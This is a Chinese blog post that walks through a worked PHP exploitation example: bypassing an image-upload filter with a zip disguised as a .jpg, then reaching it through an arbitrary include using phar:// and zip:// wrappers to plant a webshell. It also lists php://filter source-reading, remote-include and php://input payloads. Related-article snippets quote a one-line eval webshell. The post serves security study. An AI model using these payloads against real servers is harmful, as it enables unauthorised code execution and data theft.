php文件包含+伪协议+文件上传漏洞利用实例

最新推荐文章于 2024-08-07 10:58:17 发布
最新推荐文章于 2024-08-07 10:58:17 发布
阅读量1.4w 收藏 11
点赞数 3
分类专栏: Security 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010726042/article/details/75041367
版权
1.上传文件过滤了后缀名和MIME类型,$_FILES['pic']['type']是由浏览器传输的文件类型决定,但是mime_content_type()是由php
内置方法判断文件类型;        
支持文件类型为application/zip,支持上传zip压缩文件,后缀名还是要改成.jpg或.gif,上传后将该名为随机数字(1499394959).jpg格式 
$name1=substr($name,-4);
if(($name1!==".gif") and ($name1!==".jpg"))
{
    echo "<script language=javascript>alert('上传照片只能是JPG或者GIF!');history.go(-1)</script>";
    exit;
}
if(mime_content_type($tmpName)!=="image/jpeg"&&mime_content_type($tmpName)!=="image/gif"&&mime_content_type($tmpName)!=="application/zip")
{
    echo mime_content_type($tmpName);
    echo "<script language=javascript>alert('上传照片只能是JPG或者GIF!');history.go(-1)</script>";
    exit;
}




2.任意文件包含     
$f = $_GET['f'];
include_once('sys/config.php');
include($f);

利用zip或phar伪协议读取压缩包中的文件
/about.php?f=phar://./images/1499394959.jpg/1.php
/about.php?f=zip://./images/1499394959.jpg%231.php    

上传webshell完成


扩展:

php伪协议:

 
 

  
  file:
  
  // — 访问本地文件系统
 
 

 
 

  
  http:
  
  // — 访问 HTTP(s) 网址
 
 

 
 

  
  ftp:
  
  // — 访问 FTP(s) URLs
 
 

 
 

  
  php:
  
  // — 访问各个输入/输出流(I/O streams)
 
 

 
 

  
  zlib:
  
  // — 压缩流
 
 

 
 

  
  data:
  
  // — 数据(RFC 2397)
 
 

 
 

  
  glob:
  
  // — 查找匹配的文件路径模式
 
 

 
 

  
  phar:
  
  // — PHP 归档
 
 

 
 

  
  ssh2:
  
  // — Secure Shell 2
 
 

 
 

  
  rar:
  
  // — RAR
 
 

 
 

  
  ogg:
  
  // — 音频流
 
 

 
 

  
  expect:
  
  // — 处理交互式的流

读取页面源代码
/about.php?f=php://filter/convert.base64-encode/resource=index.php
以base64加密的形式读取页面源代码,然后在再对代码进行base64解密就可以得到源代码

当php配置allow_url_include和allow_url_fopen都为On的时候,可以对文件进行远程包含
例如:about.php?f=http://web/1.php
当allow_url_include为On,而allow_url_fopen为Off的是否,不可以直接远程包含文件,但是可以使用php://input、 php://stdin、 php://memory 和 php://temp等伪协议
例如about.php?f=php://input  post传输数据<?php phpinfo(); ?>

Q1n6
关注
专栏目录
【网络安全】测试文件上传漏洞的 5 种高级方法
等风来
08-26 76
深入了解文件上传漏洞后,我们可以实现严重性影响,即使它不是 webshell RCE,它仍然可以通过其他方式损害服务器:读取文件(curl_exec)、XXE、XSS 和覆盖现有文件。
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
php网站图片上传攻击,PHP安全-文件上传攻击
weixin_31133141的博客
03-10 292
文件上传攻击有时在除了标准的表单数据外,你还需要让用户进行文件上传。由于文件在表单中传送时与其它的表单数据不同,你必须指定一个特别的编码方式multipart/form-data:CODE:enctype="multipart/form-data">一个同时有普通表单数据和文件的表单是一个特殊的格式,而指定编码方式可以使浏览器能按该可格式的要求去处理。允许用户进行选择文件并上传的表单元素是很...
文件包含漏洞全面详解
最新发布
weixin_42340783的博客
08-07 1346
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
PHP伪协议文件包含漏洞
z1moq的博客
08-26 334
文件包含漏洞 为了更好的使用代码的复用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码。但这就产生了文件包含漏洞,产生原因实在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时如果用户对变量可控,二服务器端卫队变量进行合理的校验或者校验被绕过,就会导致文件包含漏洞 文件包含所用的函数 函数 功能 include() 代码执行到 include() 函数时将执行文件中的 PHP代码 include_once() 当重
文件包含漏洞
热门推荐
selecthch的博客
06-11 1万+
1、文件包含漏洞简介 1、1什么是文件包含          程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 ...
文件包含漏洞特点和php封装伪协议
bwxzdjn的博客
04-24 2558
用实验案例的方式介绍文件包含漏洞的成因特点,利用方法。在了解文件包含漏洞的危害的同时学习各类文件的包含、本地包含配合文件上传包含图片马和php封装伪协议
渗透测试 2 --- XSS、CSRF、文件上传文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3180
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
文件包含漏洞相关知识总结
qq_27710251的博客
08-16 1382
文件包含漏洞相关知识总结 1. 文件包含漏洞概念 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入 2. 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 3. 常见文件包含函数 include() require() include_
文件包含及代码执行及命令执行
j1044957016的博客
06-01 2573
文件包含,代码执行,命令执行常见的函数,以及如何绕过过滤
dvwa文件包含漏洞
qq_51177088的博客
05-12 400
文件包含漏洞原理1.本地文件包含2. 远程文件包含3.日志文件包含 ??知识点实例 原理 当服务器开启allow_url_include时,通过PHP函数(如include)去动态包含文件,且该输入用户可控,即会造成文件包含漏洞 eg: #漏洞: <?php include $_GET['filename']; ?> #我们控制输入file为恶意文件test.php filename=test.php #test.php <?php phpinfo(); ?> 1.本地文件包
php伪协议漏洞_php伪协议利用文件包含漏洞
weixin_42465158的博客
01-17 415
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本设置allow_url_fopen和allow_url_include都为On.index.php index.php同级目录下有mytest001.txtmytest002.txt mytest003…txt 再说明一下,include...
php伪协议漏洞_PHP伪协议总结
weixin_39658019的博客
01-17 199
参考了这篇文章:php伪协议实现命令执行的七种姿势,并根据自己理解进行了总结,也算是加深一下印象,方便以后使用。file:// 协议条件:allow_url_fopen:off/onallow_url_include :off/on作用:用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。include()/requ...
Web安全文件上传漏洞测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
05-21 2696
现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(php,jsp、aspx,asp文件后缀)到服务器上,并将恶意文件传递给网站脚本语言去执行,然后就可以在服务器上执行恶意代码,进行数据库执行、服务器文件管理,服务器命令执行等恶意操作.
文件上传漏洞测试upload-labs
vsdfbhsdhsdfh的博客
03-18 5409
文件上传是web十大安全漏洞之一,它是我们在信息安全渗透测试中最常见的漏洞类型 他主要是一些网站上传用的的头像文件的时候没有进行过滤,利用PHP本身的远程木马执行,利用中国菜刀,蚁剑之类的工具进行连接,获取服务器其权限,方便在进行提取等进行拿去服务器web shell权限 下面我们主要进行upload-labs靶场进行练习 Pass-01 正在上传…重新上传取消 我们先直接上传试试 正在上传…重新上传取消 显示请上传jpg类型的文件我们在打开bure抓包 正在上传…重新上传取消 把后缀..
基本文件上传漏洞攻击实验
MJ的博客
06-09 1377
1.实验准备:卸掉我windows的360安全卫士等毒杀,下载中国菜刀。肉鸡:阿里云测试环境 2.实验大致步骤:编写php等一句话木马(<?php @eval($_POST['chopper']);?>),上传php脚本或直接写到服务器目录,使用菜刀连接。详细参考 3.实验结果: 菜刀连接失败,之前能访问的测试环境网址在尝试菜刀连接后已无法访问,但是能ping通,打开windows 的git bash尝试curl 访问依然失败,但是服务器curl是成功的。使用手机访问测试环境网站是可以的(
文件上传漏洞——文件上传检测与绕过
weixin_54055099的博客
09-20 2769
文件上传漏洞之客户端检测与绕过
web漏洞——文件上传漏洞(upload-labs)
net的博客
02-25 3443
由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。文件上传漏洞本身就是一个危害巨大的漏洞,WebShell更是将这种漏洞的利用无限扩大。大多数的。
【burpsuite安全练兵场-服务端8】文件上传漏洞-7个实验(全)
01-10 1万+
【BP靶场portswigger-服务端8-文件上传漏洞】7个实验-万文详细步骤
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值